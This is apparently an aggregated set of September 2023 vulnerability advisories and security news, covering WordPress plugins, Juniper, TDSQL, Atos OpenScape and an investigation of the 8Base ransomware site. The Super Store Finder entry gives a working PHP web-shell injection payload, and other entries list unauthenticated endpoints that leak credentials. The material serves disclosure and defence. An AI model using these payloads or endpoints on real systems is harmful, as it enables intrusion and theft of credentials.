WordPress Essential Blocks plugin versions 4.2.0 and below and Essential Blocks Pro versions 1.1.0 and below suffer from multiple PHP object injection vulnerabilities.

**WordPress Essential Blocks 4.2.0 / Essential Blocks Pro 1.1.0 PHP Object Injection**

    Vulnerability Summary from Wordfence IntelligenceDescription: Insecure Deserialization/PHP Object Injection via queries Affected Plugin: Essential Blocks, Essential Blocks ProPlugin slug: essential-blocks, essential-blocks-proVendor: WPDeveloperAffected versions: <= 4.2.0 (Free) and <= 1.1.0 (Pro)CVE ID: CVE-2023-4386CVSS score: 8.1 (High)CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:HResearcher: Marco Wotschka Fully Patched Version: 4.2.1 & 1.1.1The Essential Blocks plugin for WordPress is vulnerable to PHP Object Injection in versions up to, and including, 4.2.0 via deserialization of untrusted input in the get_posts function. This allows unauthenticated attackers to inject a PHP Object. No POP chain is present in the vulnerable plugin. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.Description: Insecure Deserialization/PHP Object Injection via products Affected Plugin: Essential Blocks, Essential Blocks ProPlugin slug: essential-blocksVendor: WPDeveloperAffected versions: <= 4.2.0 (Free) and <= 1.1.0 (Pro)CVE ID: CVE-2023-4402CVSS score: 8.1 (High)CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:HResearcher: Marco Wotschka Fully Patched Version: 4.2.1 & 1.1.1The Essential Blocks plugin for WordPress is vulnerable to PHP Object Injection in versions up to, and including, 4.2.0 via deserialization of untrusted input in the get_products function. This allows unauthenticated attackers to inject a PHP Object. No POP chain is present in the vulnerable plugin. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.Technical AnalysisThe Essential Blocks plugin provides more than 40 blocks to its users including sliders, buttons, pricing tables, maps and others. An API is provided to query for posts and products via the queries and products API endpoints which do not require authentication.Unfortunately, query data and attributes were passed in PHP’s serialized string format and were subsequently unserialized by the functions get_posts (for the queries endpoint) and get_products (for the products endpoint) in /includes/API/PostBlock.php and /includes/API/Product.php, respectively.php-objection-injection-posts get_posts functionphp-objection-injection-products get_products functionAttackers could utilize this to inject a PHP object with properties of their choosing. The presence of a PHP POP chain can make it possible for an attacker to execute arbitrary code, create and delete files and potentially ultimately take over a vulnerable site. Fortunately, no POP chain is present in the Essential Blocks plugin, which means an attacker would require another plugin or theme installed on the vulnerable site with a POP chain present in order to fully exploit these vulnerabilities. It is worth mentioning that POP chains can sometimes be found in popular plugins and libraries which include destructor methods that perform cleanup tasks when an Object is destroyed or deserialized.Despite the lack of a POP chain in the Essential Blocks plugin itself, and the complexity involved in exploiting these types of vulnerabilities, a successful attack often leads to severe consequences. We explain how PHP Object Injections work in this blog post, if you are interested to find out more about their inner workings.TimelineAugust 17, 2023 – The Wordfence Threat Intelligence team discovers two PHP Object Injection vulnerabilities in the Essential Blocks plugin.August 18, 2023 – We release a firewall rule to protect Wordfence Premium, Wordfence Care, and Wordfence Response customers and initiate the disclosure process.August 23, 2023 – We send the full disclosure to the plugin developer.August 29, 2023 – A patched version of the Essential Blocks plugin, 4.2.1 (1.1.1 for Pro), is released.September 17, 2023 – The firewall rule becomes available to free Wordfence users.ConclusionIn this blog post, we covered two PHP Object Injection vulnerabilities in the Essential Blocks plugin affecting versions 4.2.0 and earlier in the Free version of the plugin and versions 1.1.0 and earlier in the Pro version. These vulnerabilities allow unauthenticated threat actors to query the plugin’s API using serialized malicious payloads that are subsequently deserialized. They have been fully addressed in version 4.2.1 of the free version of the plugin and 1.1.1 of the Pro version of the plugin.We encourage WordPress users to verify that their sites are updated to the latest patched version of Essential Blocks.All Wordfence running Wordfence Premium, Wordfence Care, and Wordfence Response, have been protected against these vulnerabilities as of August 18, 2023. Users still using the free version of Wordfence received protection on September 17, 2023.If you know someone who uses this plugin on their site, we recommend sharing this advisory with them to ensure their site remains secure, as this vulnerability poses a significant risk.For security researchers looking to disclose vulnerabilities responsibly and obtain a CVE ID, you can submit your findings to Wordfence Intelligence and potentially earn a spot on our leaderboard.

WordPress Essential Blocks 4.2.0 / Essential Blocks Pro 1.1.0 PHP Object Injection

Super Store Finder versions 3.7 and below suffer from a remote command execution vulnerability.

    # Vulnerability : Authenticated Arbitrary PHP Code Injection lead to RemoteCode Execution# Researcher : Etharus# Vendor : Joe Iz, https://www.superstorefinder.net/# Demo Url : https://superstorefinder.net/products/superstorefinder/# Version Affected : 3.7 and below# Date : 18 September 2023# FOFA Dork : "designed and built by Joe Iz."# Step 1 : Login as user/admin# Step 2 : Go to Settings on right top# Step 3 : Turn on proxy to intercept request and save the settings# Step 4 : On language_set parameter set the value to  en_US');!isset($_GET['cmd'])?:system($_GET['cmd']);//# Step 5 : Due to index.php called config.inc.php , we just can go for rcewith parameter ?cmd=# Step 6 : Example. http://localhost/?cmd=uname%20-a

Super Store Finder 3.7 Remote Command Execution

New research has found that close to 12,000 internet-exposed Juniper firewall devices are vulnerable to a recently disclosed remote code execution flaw.
VulnCheck, which discovered a new exploit for CVE-2023-36845, said it could be exploited by an "unauthenticated and remote attacker to execute arbitrary code on Juniper firewalls without creating a file on the system."
CVE-2023-36845 refers to a

Network Security / Exploit

New research has found that close to 12,000 internet-exposed Juniper firewall devices are vulnerable to a recently disclosed remote code execution flaw.

VulnCheck, which discovered a new exploit for CVE-2023-36845, said it could be exploited by an "unauthenticated and remote attacker to execute arbitrary code on Juniper firewalls without creating a file on the system."

CVE-2023-36845 refers to a medium-severity flaw in the J-Web component of Junos OS that could be weaponized by a threat actor to control certain, important environment variables. It was patched by Juniper Networks last month alongside CVE-2023-36844, CVE-2023-36846, and CVE-2023-36847 in an out-of-cycle update.

A subsequent proof-of-concept (PoC) exploit devised by watchTowr combined CVE-2023-36846 and CVE-2023-36845 to upload a PHP file containing malicious shellcode and achieve code execution.

The latest exploit, on the other hand, impacts older systems and can be written using a single cURL command. Specifically, it relies on just CVE-2023-36845 to realize the same objective.

This, in turn, is accomplished by using the standard input stream (aka stdin) to set the PHPRC environment variable to "/dev/fd/0" via a specially crafted HTTP request, effectively turning "/dev/fd/0" into a makeshift file, and leak sensitive information.

Arbitrary code execution is then achieved by leveraging PHP's auto\_prepend\_file and allow\_url\_include options in conjunction with the data:// protocol wrapper.

UPCOMING WEBINAR

Identity is the New Endpoint: Mastering SaaS Security in the Modern Age

Dive deep into the future of SaaS security with Maor Bin, CEO of Adaptive Shield. Discover why identity is the new endpoint. Secure your spot now.

Supercharge Your Skills

"Firewalls are interesting targets to APT as they help bridge into the protected network and can serve as useful hosts for C2 infrastructure," Jacob Baines said. "Anyone who has an unpatched Juniper firewall should examine it for signs of compromise."

Juniper has since disclosed that it's not aware of a successful exploit against its customers, but warned that it has detected exploitation attempts in the wild, making it imperative that users apply the necessary fixes to mitigate potential threats.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Over 12,000 Juniper Firewalls Found Vulnerable to Recently Disclosed RCE Vulnerability

The Super Store Finder plugin for WordPress is vulnerable to unauthenticated arbitrary email creation and relay in versions up to, and including, 6.9.2. This is due to insufficient restrictions on the sendMail.php file that allows direct access. This makes it possible for unauthenticated attackers to send emails utilizing the vulnerable site's server, with arbitrary content. Please note that this vulnerability has already been publicly disclosed with an exploit which is why we are publishing the details without a patch available, we are attempting to initiate contact with the developer.

*   Products
*   About Us
*   Live Demos
    
    *   Super Store Finder
    *   Addon - Custom Marker
    *   Addon - Marker Clusterer
    *   Addon - Multi Categories
    *   Addon - Exact Geo
    *   Theme - Mega Locator
    *   Theme - Compact
    *   Super Store Finder for Wordpress
    *   WP Addon - Custom Marker
    *   WP Addon - Marker Clusterer
    *   WP Addon - Multi Category
    *   WP Addon - Distance Radius
    *   WP Addon - Reviews & Ratings
    *   WP Addon - Google Reviews
    *   Super Logos Showcase
    *   Super Product Variation Swatches
    *   Super Responsive Accordion
    *   WP Comment Image/Video
    *   Super Interactive Maps
    
    *   **Standalone** Store Finder
    *   Custom Marker
    *   Marker Clusterer
    *   Multi Category
    *   Exact Geo
    *   Mega Locator
    *   Compact
    
    *   **WordPress** Store Finder
    *   Custom Marker
    *   Marker Clusterer
    *   Multi Category
    *   Distance Radius
    *   Social Ratings
    *   Google Reviews
    *   Logos Showcase
    *   Swatches
    *   Accordion
    *   WP Comments
    *   Vector Maps
    
*   Community
    *   Forums
    *   Testimonials
    *   Affiliate Partner
    *   Free Markers
    *   Free Skins
    *   Patch Notes
    *   Real Examples
    *   Latest News
    *   Facebook
    *   Instagram
    *   Twitter
    *   Youtube
*   Knowledge Base
*   Support
*   *   About Us
    *   Support
    *   Forums
    *   Testimonials
    *   Knowledge Base
    *   Affiliates
    *   Jobs
    *   Real Examples
    *   Latest News
    *   Privacy Policy
    *   AudioJungle
    *   ThemeForest
    *   VideoHive
    *   GraphicRiver
    *   3DOcean
    *   CodeCanyon
    *   Tuts+ Marketplace
    *   PhotoDune
    *   Best Hosting/Domain
    *   Terms of Service

*   **Newsletter**
    
    Join our newsletter to get updates on the latest news, tips, patch releases and upcoming products.
    
*   © Copyright 2023 Super Store Finder. All rights reserved.

CVE-2023-5054: Super Store Finder - Best Selling Store Locator Plugin

The victim shaming website operated by the cybercriminals behind 8Base -- currently one of the more active ransomware groups -- was until earlier today leaking quite a bit of information that the crime group probably did not intend to be made public. The leaked data suggests that at least some of website's code was written by a 36-year-old programmer residing in the capital city of Moldova.

The victim shaming website operated by the cybercriminals behind **8Base** — currently one of the more active ransomware groups — was until earlier today leaking quite a bit of information that the crime group probably did not intend to be made public. The leaked data suggests that at least some of website’s code was written by a 36-year-old programmer residing in the capital city of Moldova.

The 8Base ransomware group’s victim shaming website on the darknet.

8Base maintains a darknet website that is only reachable via Tor, a freely available global anonymity network. The site lists hundreds of victim organizations and companies — all allegedly hacking victims that refused to pay a ransom to keep their stolen data from being published.

The 8Base darknet site also has a built-in chat feature, presumably so that 8Base victims can communicate and negotiate with their extortionists. This chat feature, which runs on the Laravel web application framework, works fine as long as you are \*sending\* information to the site (i.e., by making a “POST” request).

However, if one were to try to fetch data from the same chat service (i.e., by making a “GET” request), the website until quite recently generated an extremely verbose error message:

The verbose error message when one tries to pull data from 8Base’s darknet site. Notice the link at the bottom of this image, which is generated when one hovers over the “View commit” message under the “Git” heading.

That error page revealed the true Internet address of the Tor hidden service that houses the 8Base website: 95.216.51\[.\]74, which according to DomainTools.com is a server in Finland that is tied to the Germany-based hosting giant Hetzner.

But that’s not the interesting part: Scrolling down the lengthy error message, we can see a link to a private Gitlab server called Jcube-group: **gitlab\[.\]com/jcube-group/clients/apex/8base-v2**. Digging further into this Gitlab account, we can find some curious data points available in the JCube Group’s public code repository.

For example, this “status.php” page, which was committed to JCube Group’s Gitlab repository roughly one month ago, includes code that makes several mentions of the term “KYC” (e.g. KYC\_UNVERIFIED, KYC\_VERIFIED, and KYC\_PENDING).

This is curious because a FAQ on the 8Base darknet site includes a section on “special offers for journalists and reporters,” which says the crime group is open to interviews but that journalists will need to prove their identity before any interview can take place. The 8base FAQ refers to this vetting process as “KYC,” which typically stands for “Know Your Customer.”

“We highly respect the work of journalists and consider information to be our priority,” the 8Base FAQ reads. “We have a special program for journalists which includes sharing information a few hours or even days before it is officially published on our news website and Telegram channel: you would need to go through a KYC procedure to apply. Journalists and reporters can contact us via our PR Telegram channel with any questions.”

The 8Base FAQ (left) and the KYC code in Kolev’s Gitlab account (right)

The 8Base darknet site also has a publicly accessible “admin” login page, which features an image of a commercial passenger plane parked at what appears to be an airport. Next to the airplane photo is a message that reads, “Welcome to 8Base. Admin Login to 8Base dashboard.”

The login page on the 8Base ransomware group’s darknet website.

Right-clicking on the 8Base admin page and selecting “View Source” produces the page’s HTML code. That code is virtually identical to a “login.blade.php” page that was authored and committed to JCube Group’s Gitlab repository roughly three weeks ago.

It appears the person responsible for the JCube Group’s code is a 36-year-old developer from Chisinau, Moldova named **Andrei Kolev**. Mr. Kolev’s LinkedIn page says he’s a full-stack developer at JCube Group, and that he’s currently looking for work. The homepage for Jcubegroup\[.\]com lists an address and phone number that Moldovan business records confirm is tied to Mr. Kolev.

The posts on the Twitter account for Mr. Kolev (@andrewkolev) are all written in Russian, and reference several now-defunct online businesses, including pluginspro\[.\]ru.

Reached for comment via LinkedIn, Mr. Kolev said he had no idea why the 8Base darknet site was pulling code from the “clients” directory of his private JCube Group Gitlab repository, or how the 8Base name was even included.

“I \[don’t have\] a clue, I don’t have that project in my repo,” Kolev explained. “They \[aren’t\] my clients. Actually we currently have just our own projects.”

Mr. Kolev shared a screenshot of his current projects, but very quickly after that deleted it. However, KrebsOnSecurity captured a copy of the image before it was removed:

A screenshot of Mr. Kolev’s current projects that he quickly deleted.

Within minutes of explaining why I was reaching out to Mr. Kolev and walking him through the process of finding this connection, the 8Base website was changed, and the error message that linked to the JCube Group private Gitlab repository no longer appeared. Instead, trying the same “GET” method described above caused the 8Base website to return a “405 Method Not Allowed” error page:

Mr. Kolev claimed he didn’t know anything about the now-removed error page on 8Base’s site that referenced his private Gitlab repo, and said he deleted the screenshot from our LinkedIn chat because it contained private information.

Ransomware groups are known to remotely hire developers for specific projects without disclosing exactly who they are or how the new hire’s code is intended to be used, and it is possible that one of Mr. Kolev’s clients is merely a front for 8Base. But despite 8Base’s statement that they are happy to correspond with journalists, KrebsOnSecurity is still waiting for a reply from the group via their Telegram channel.

The tip about the leaky 8Base website was provided by a reader who asked to remain anonymous. That reader, a legitimate security professional and researcher who goes by the handle @htmalgae on Twitter, said it is likely that whoever developed the 8Base website inadvertently left it in “development mode,” which is what caused the site to be so verbose with its error messages.

“If 8Base was running the app in production mode instead of development mode, this Tor de-anonymization would have never been possible,” @htmalgae said.

A recent blog post from **VMware/Carbon Black** called the 8Base ransomware group “a heavy hitter” that has remained relatively unknown despite the massive spike in activity in Summer of 2023.

“8Base is a Ransomware group that has been active since March 2022 with a significant spike in activity in June of 2023,” Carbon Black researchers wrote. “Describing themselves as ‘simple pen testers,’ their leak site provided victim details through Frequently Asked Questions and Rules sections as well as multiple ways to contact them. ”

According to VMware, what’s particularly interesting about 8Base’s communication style is the use of verbiage that is strikingly familiar to another known cybercriminal group: RansomHouse.

“The group utilizes encryption paired with ‘name-and-shame’ techniques to compel their victims to pay their ransoms,” VMware researchers wrote. “8Base has an opportunistic pattern of compromise with recent victims spanning across varied industries. Despite the high amount of compromises, the information regarding identities, methodology, and underlying motivation behind these incidents still remains a mystery.”

Who’s Behind the 8Base Ransomware Website?

An issue in TDSQL Chitu management platform v.10.3.19.5.0 allows a remote attacker to obtain sensitive information via get_db_info function in install.php.

Skip to content

Sign up

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    
    Explore
    
    *   All features
    *   Documentation
    *   GitHub Skills
    *   Blog
    
*   For
    
    *   Enterprise
    *   Teams
    *   Startups
    *   Education
    
    By Solution
    
    *   CI/CD & Automation
    *   DevOps
    *   DevSecOps
    
    Resources
    
    *   Customer Stories
    *   White papers, Ebooks, Webinars
    *   Partners
    
*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
    Repositories
    
    *   Topics
    *   Trending
    *   Collections
    
*   Pricing

**Search code, repositories, users, issues, pull requests...**

**Provide feedback**

We read every piece of feedback, and take your input very seriously.

Include my email address so I can be contacted

**Saved searches****Use saved searches to filter your results more quickly**

Sign in

Sign up

ranhn / **TDSQL** Public

*   Notifications
*   Fork 0
*   Star 0
    

腾讯tdsql赤兔管理平台接口未授权访问信息泄露

0 stars 0 forks Activity

Star

Notifications

*   Code
*   Issues
*   Pull requests
*   Actions
*   Projects
*   Security
*   Insights

More

main

Switch branches/tags

**Name already in use**

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?

**1** branch **0** tags

Code

*   Clone
    
    Use Git or checkout with SVN using the web URL.
    
*   Open with GitHub Desktop
*   Download ZIP

**Latest commit**

**Git stats**

*   **10** commits

**Files**Permalink

Failed to load latest commit information.

Type

Name

Latest commit message

Commit time

README.md

**README.md**

**tdsql**

腾讯TDSQL接口未授权访问信息泄露

CVE-2023-42387

漏洞地址： http://tdsql-xxxxxxx.com/tdsqlpcloud/index.php/api/install/get\_db\_info

漏洞描述： tdsql赤兔管理平台，api接口存在未授权返回数据库明文配置信息。

漏洞详情： 代码审计 

1，访问上述接口。  2，得到明文账号密码，登录数据库。 

漏洞版本： 赤免管理台 V1.8.9-1 bdffe65

修复建议：

class Install extends API\_Controller{ public function \_\_construct(){ parent::\_\_construct(false); --修改为true } /\*\*

*   获取数据库访问信息

*   @author kevenchen
*   @type GET/POST

*   @return string ip 数据库IP
*   @return string port 数据库端口
*   @return string user 数据库账号
*   @return string pwd 数据库密码

*   @example {url} / public function get\_db\_info(){ – public修改为protect $this->config->load(‘database’); $dbconfs = $this->config->item(‘dbconfs’); $dbdefault = $this->config->item(‘dbdefault’); $conf = $dbconfs\[$dbdefault\]; $info = array( ‘ip’ => $conf\[‘hostname’\], ‘port’ => $conf\[‘port’\], ‘user’ => $conf\[‘username’\], ‘pwd’ => $conf\[‘password’\], ); echo json\_encode($info); } /\*

**About**

腾讯tdsql赤兔管理平台接口未授权访问信息泄露

**Resources**

Readme

Activity

**Stars**

**0** stars

**Watchers**

**1** watching

**Forks**

**0** forks

Report repository

**Releases**

No releases published

**Packages**

No packages published

CVE-2023-42387: GitHub - ranhn/TDSQL: 腾讯tdsql赤兔管理平台接口未授权访问信息泄露

Atos Unify OpenScape Session Border Controller, Atos Unify OpenScape Branch, and Atos Unify OpenScape BCF suffer from remote code execution and missing authentication vulnerabilities. Atos OpenScape SBC versions before 10 R3.3.0, Branch version 10 versions before R3.3.0, and BCF version 10 versions before 10 R10.10.0 are affected.

SEC Consult Vulnerability Lab Security Advisory < 20230918-0 >  
=======================================================================  
               title: Authenticated Remote Code Execution and  
                      Missing Authentication  
             product: Atos Unify OpenScape Session Border Controller  
                      Atos Unify OpenScape Branch  
                      Atos Unify OpenScape BCF  
  vulnerable version: OpenScape SBC before V10 R3.3.0  
                      OpenScape Branch V10 before V10 R3.3.0  
                      OpenScape BCF V10 before V10 R10.10.0  
       fixed version: OpenScape SBC V10 >=R3.3.0  
                      OpenScape Branch V10 >=R3.3.0  
                      OpenScape BCF V10 >=R10.10.0  
          CVE number: CVE-2023-36618, CVE-2023-36619  
              impact: critical  
            homepage: https://unify.com  
               found: 2023-04-21  
                  by: Armin Weihbold (Office Linz)  
                      SEC Consult Vulnerability Lab

                      An integrated part of SEC Consult, an Eviden business  
                      Europe | Asia

                      https://www.sec-consult.com

=======================================================================

Vendor description:  
-------------------  
"Unify is is the Atos brand for communication and collaboration solutions  
Unify is the newest member of the Atos family, combining Atos’ knowledge and  
reputation in the IT services market with Unify’s expertise in unified  
communications and collaboration to provide customers with seamless services  
solutions for their entire digital portfolio. Within Atos, Unify continues to  
deliver a unique integrated proposition for unified communications and real  
time capabilities."

Source: https://unify.com/en/expert/unify

Business recommendation:  
------------------------  
SEC Consult recommends users of the affected products to install the latest  
update.

Furthermore, an in-depth security analysis performed by security professionals  
is highly advised, as the software may be affected from other security issues.

Vulnerability overview/description:  
-----------------------------------  
1) Authenticated Remote Code Execution (CVE-2023-36618)  
The API of the administrative web application insufficiently validates the  
input of authenticated users at the server. This leads to the possibility of  
executing arbitrary PHP functions (with some defined exceptions) and  
subsequently operating system level commands with root privileges.  
A low-privileged ReadOnly role is sufficient to exploit this security issue.

2) Missing Authentication (CVE-2023-36619)  
A number of scripts that are used to administer the appliance can be  
accessed or executed unauthenticated via the web server.

Proof of concept:  
-----------------  
1) Authenticated Remote Code Execution (CVE-2023-36618)  
A large part of the application is built according to the scheme in the  
following listing. Some functions are defined and at the end the function  
`callMainFunction` is called, which takes care of processing POST data.

-----------------------------------------------------------------------  
  <?php  
     require_once '../core/CoreAPI.php';

     function tempSessionAcdQueue($args = null)  
     {  
         [...SNIP...]  
     }

     function getAcdQueueInfo($args = null) {  
         [...SNIP...]  
     }

     // calls function which will handle the Post requests  
     callMainFunction();  
-----------------------------------------------------------------------

`callMainFunction` in `/srv/www/htdocs/core/CoreAPI.php` essentially  
calls arbitrary functions with arbitrary arguments passed via POST parameters,  
and only tests beforehand whether or not they are in a list of forbidden  
functions (`cfgUtilCheckMethod`) and whether the user is authenticated:

-----------------------------------------------------------------------  
     <?php  
[...]  
     require_once 'cfgUtil.php';  
[...]

     function callMainFunction () {

         $func = ( isset($_POST['method']) ) ? trim(cfgUtilGetPostData('method')) : null ;  
         if (cfgUtilCheckMethod($func)) return;  
         $args = ( isset($_POST['args']) ) ? cfgUtilSanitizePostArgs(json_decode($_POST['args'], true)) : null ;  
[...]

         if ( function_exists($func) && is_callable($func) ) {  
             @session_start();  
             if (!isset($_SESSION["Authenticated"]) || ($_SESSION["Authenticated"] == false)) {  
                 session_destroy();  
[...]  
             } else {  
                 if ( $args != null ) $func($args);  
                 else $func();  
             }  
         }  
     }  
-----------------------------------------------------------------------

Then `cfgUtilCheckMethod` in `/srv/www/htdocs/core/cfgUtil.php` checks for a number  
of dangerous functions which should get blocked:

-----------------------------------------------------------------------  
function cfgUtilCheckMethod($func)  
{  
     if (isset($func)) {  
         // block methods  
         $methods = array(  
[...]  
             “eval”,  
             “exec”,  
[...]  
             “shell_exec”,  
[...]  
             “system”,  
         );  
         if (in_array($func, $methods)) return 1;  
     }  
     return 0;  
}  
-----------------------------------------------------------------------

What has been forgotten here are the functions provided by cfgUtil.php itself  
like `cfgUtilExecute`, `cfgUtilShellExec` and especially  
`cfgUtilShellExecSudo`, `cfgUtilSetPermExecSudo` and `cfgUtilExecSudo`.

These functions allow an authenticated attacker (a ReadOnly role is sufficient  
for this) to execute arbitrary commands as root user on the appliance.

-----------------------------------------------------------------------  
function cfgUtilShellExecSudo( $command, $escape = TRUE, $supressLog = FALSE )  
{  
     $newcommand=$command;  
     if ( $escape == TRUE ) $newcommand = escapeshellcmd($command);  
     if ( ($newcommand != $command) and ($supressLog != TRUE ) )  
         osb_log(E_WARNING, debug_backtrace()[1][‘function’]. “(): The command: “ . $command . “ is not equivalent to: “ . $newcommand);  
     $retvalue = trim(shell_exec(‘/usr/bin/sudo ‘ . $newcommand ));  
     return $retvalue;  
}  
-----------------------------------------------------------------------

To demonstrate the RCE vulnerability, it is sufficient to send a request like  
the following to any endpoint that calls `callMainFunction` like in:  
[PoC URL removed]  
-----------------------------------------------------------------------  
[PoC POST request removed]  
-----------------------------------------------------------------------

The server response indicates a successful request:  
-----------------------------------------------------------------------  
HTTP/1.1 200 OK  
Date: Fri, 21 Apr 2023 10:22:42 GMT  
Server: Apache  
X-Frame-Options: SAMEORIGIN  
Expires: 0  
Cache-Control: max-age=0, must-revalidate  
Pragma: no-cache  
Content-Length: 0  
Connection: close  
Content-Type: text/html; charset=UTF-8  
-----------------------------------------------------------------------

If we now list the contents of the `/tmp` directory on the server, we see  
that the file `root_from_ro` was created by the root user:

-----------------------------------------------------------------------  
user@server:/tmp> ls -al  
[...]  
-rw-r--r--  1 root        root           0 Apr 21 10:22 root_from_ro  
-----------------------------------------------------------------------

2) Missing Authentication (CVE-2023-36619)  
The following scripts, which are executable without authentication and  
do not expect command line arguments, could be identified. For this,  
heuristic methods based on the source code were used. In particular, scripts  
were searched that do not use any of the normally used authentication  
methods and do not only consist of classes.

- https://hostname/core/configuringInBackground.php  
- https://hostname/core/downloadProfiles.php  
- https://hostname/core/hello_world.php  
- https://hostname/core/scripts/applyZooServerData.php  
- https://hostname/core/scripts/cfgGenUpdateSSPStatusTable.php  
- https://hostname/core/scripts/checkcardsDbHw.php  
- https://hostname/core/scripts/config1.php  
- https://hostname/core/scripts/recover.php  
- https://hostname/core/scripts/start.php  
- https://hostname/core/scripts/startPre.php  
- https://hostname/core/shutdown.php  
- https://hostname/data/sipLbInfo.php  
- https://hostname/data/turnInfo.php

The following demonstrates an execution. The following request is sent  
to the appliance:

-----------------------------------------------------------------------  
GET /core/scripts/start.php HTTP/1.1  
Host: hostname  
Upgrade-Insecure-Requests: 1  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: navigate  
Sec-Fetch-Dest: document  
Referer: https://hostname/acd.html  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9  
Connection: close  
-----------------------------------------------------------------------

In the successful response, the time is highlighted to compare with the PHP  
log:

-----------------------------------------------------------------------  
HTTP/1.1 200 OK  
Date: Thu, 20 Apr 2023 11:47:34 GMT  
Server: Apache  
X-Frame-Options: SAMEORIGIN  
Cache-Control: max-age=0, must-revalidate  
Pragma: no-cache  
Expires: 0  
Content-Length: 0  
Connection: close  
Content-Type: text/html; charset=UTF-8  
-----------------------------------------------------------------------

In the PHP log you will now find the following output, which shows that  
this script is used for configuring and starting the appliance and was  
actually executed:

-----------------------------------------------------------------------  
2023-04-20T11:47:34+00:00 [notice] PHP Notice:  --------------------------------------- in /srv/www/htdocs/core/scripts/start.php on line 33  
[...] ---------- Running start.php ---------- in /srv/www/htdocs/core/scripts/start.php on line 34  
[...] --------------------------------------- in /srv/www/htdocs/core/scripts/start.php on line 35  
[...] Loading XML in /srv/www/htdocs/core/scripts/start.php on line 61  
[...] --------------------------------------------- in /srv/www/htdocs/core/ConfigMgrOSS.php on line 599  
[...] --------------------------------------------- in /srv/www/htdocs/core/ConfigMgrOSS.php on line 600  
[...] ---------- Running start() OSS    ----------- in /srv/www/htdocs/core/ConfigMgrOSS.php on line 601  
[...] --------------------------------------------- in /srv/www/htdocs/core/ConfigMgrOSS.php on line 602  
[...] --------------------------------------------- in /srv/www/htdocs/core/ConfigMgrOSS.php on line 603  
[...] Starting start() OSS in /srv/www/htdocs/core/ConfigMgrOSS.php on line 607  
[...] Active partition: 4 /dev/sda6 in /srv/www/htdocs/core/ConfigMgrOSS.php on line 613  
[...] Calling hookStart start in /srv/www/htdocs/core/ConfigMgrOSS.php on line 622  
[...] Configuring Alarm in /srv/www/htdocs/core/ConfigMgrOSS.php on line 626  
[...] Configuring Node for Redundancy in /srv/www/htdocs/core/ConfigMgrOSS.php on line 630  
[...] Red. Selection cleared (standlone)... in /srv/www/htdocs/core/NetServicesData.php on line 162  
[...] Redundant Node 1 removed in /srv/www/htdocs/core/NetServicesData.php on line 163  
[...] Redundant Node 2 removed in /srv/www/htdocs/core/NetServicesData.php on line 164  
[...] Configuring Watchdog in /srv/www/htdocs/core/ConfigMgrOSS.php on line 640  
[...] Configuring irqBalance in /srv/www/htdocs/core/ConfigMgrOSS.php on line 644  
[...] Configuring OpenVmWare in /srv/www/htdocs/core/ConfigMgrOSS.php on line 648  
[...] Configuring RADIUS in /srv/www/htdocs/core/ConfigMgrOSS.php on line 662  
[...] Configuring SSH Public Keys in /srv/www/htdocs/core/ConfigMgrOSS.php on line 666  
[...] Configuring IP Aliases in /srv/www/htdocs/core/ConfigMgrOSS.php on line 671  
[...] Configuring Traffic Shaping in /srv/www/htdocs/core/ConfigMgrOSS.php on line 679  
[...] Configuring Zookeeper Client in /srv/www/htdocs/core/ConfigMgrOSS.php on line 688  
[...] Configuring RTP Proxy in /srv/www/htdocs/core/ConfigMgrOSS.php on line 693  
[...] Configuring SSM in /srv/www/htdocs/core/ConfigMgrOSS.php on line 697  
[...] Configuring SipServer in /srv/www/htdocs/core/ConfigMgrOSS.php on line 705  
[...] UA WhiteList:  in /srv/www/htdocs/core/cfgSipServerSP.php on line 2896  
[...] simplexml_load_file( /osb/var/mngmt/xml/running/config_20_20230223T115247.xml ) in /srv/www/htdocs/core/PersistenceMgr.php on line 520  
[...] Circuit feature enabled ? 0 in /srv/www/htdocs/core/AnsibleData.php on line 42  
[...] New xml cache file created daec97748bc1828d8514ee16e200a834 in /srv/www/htdocs/core/PersistenceMgr.php on line 1883  
[...] Locking SSP Register in /srv/www/htdocs/core/cfgSipServerOSS.php on line 2682  
[...] SipServer configuration changed. in /srv/www/htdocs/core/cfgSipServerSP.php on line 2595  
[...] Configuring Media Server in /srv/www/htdocs/core/ConfigMgrOSS.php on line 726  
[...] Configuring IPSec in /srv/www/htdocs/core/ConfigMgrOSS.php on line 734  
[...] Configuring VPN in /srv/www/htdocs/core/ConfigMgrOSS.php on line 741  
[...] Configuring Certificate Management in /srv/www/htdocs/core/ConfigMgrOSS.php on line 745  
[...] Configuring Web Secure Management in /srv/www/htdocs/core/ConfigMgrOSS.php on line 749  
[...] Configuring TURN Server in /srv/www/htdocs/core/ConfigMgrOSS.php on line 754  
[...] Configuring Sip Loadbalancer in /srv/www/htdocs/core/ConfigMgrOSS.php on line 759  
[...] Configuring GTC Loader in /srv/www/htdocs/core/ConfigMgrOSS.php on line 764  
[...] Configuring GTC Node app  in /srv/www/htdocs/core/ConfigMgrOSS.php on line 769  
[...] Configuring Serviceability in /srv/www/htdocs/core/ConfigMgrOSS.php on line 774  
[...] Configuring QoS Send Trap in /srv/www/htdocs/core/ConfigMgrOSS.php on line 779  
[...] Configuring Push Notification in /srv/www/htdocs/core/ConfigMgrOSS.php on line 784  
[...] Configuring Branding in /srv/www/htdocs/core/ConfigMgrOSS.php on line 797  
[...] Calling hookStart stop in /srv/www/htdocs/core/ConfigMgrOSS.php on line 800  
[...] --------------------------------------------- in /srv/www/htdocs/core/ConfigMgrOSS.php on line 838  
